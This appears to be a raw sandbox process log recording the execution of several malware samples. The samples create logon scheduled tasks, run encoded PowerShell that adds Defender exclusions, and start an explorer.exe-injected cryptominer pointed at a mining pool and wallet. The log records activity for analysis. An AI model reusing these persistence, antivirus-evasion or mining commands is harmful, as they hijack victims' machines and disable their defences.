"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9493:190:7zEvent16973
C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe
"C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d3302bdd3f92408cbf33680a6d9ab733 /t 3016 /p 408
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\" -spe -an -ai#7zMap31178:190:7zEvent3127
C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe
"C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5716 -ip 5716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 1636
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6416 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap29677:190:7zEvent10921
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap17186:190:7zEvent19545
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe vkhmukwpagbhgxxs0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0Gsol2ut25e0CiIvlYsuJiRf9cAIWsM5xNiv2CpmeSTZ4pQrFWNkEzZPEMfhraeOvsLhWY3jY+xzJ5IosXqgTdD3jVluCpzDi91PFz8FAJKOCtA6KcYwvQwF802MT/V1n/CnG34YKGCYZXIU4zRQW7lEbRoAvFGVxIf4tKfOP3Hf6S6LyTk2jeuhzzf2Zcs/0s5y+xhTpkhMOajNG7ary/m9cgvIxlkbwK4Z5kKm8TURafQOdOA6pYc+FSLPejIrpYVXzGzUYCucc1JnrFsvlMQn0ihvM4UYwSpRyIOiJG/Ku6F7NGOK/Ye1L7T6a3ZENVZhlQpPYYNgPEbnhEJs092J41opYOyT9/sUeOPXCLeCFm3ZCgbWVjF7QlJgl7+XRi1qxQqCVy15JYwYPI4ueAg==
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "wixbkzqmha"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21678:190:7zEvent32374
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C WScript "C:\ProgramData\TywqfYfUij\r.vbs"
C:\Windows\SysWOW64\wscript.exe
WScript "C:\ProgramData\TywqfYfUij\r.vbs"
C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\TywqfYfUij\cfg"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
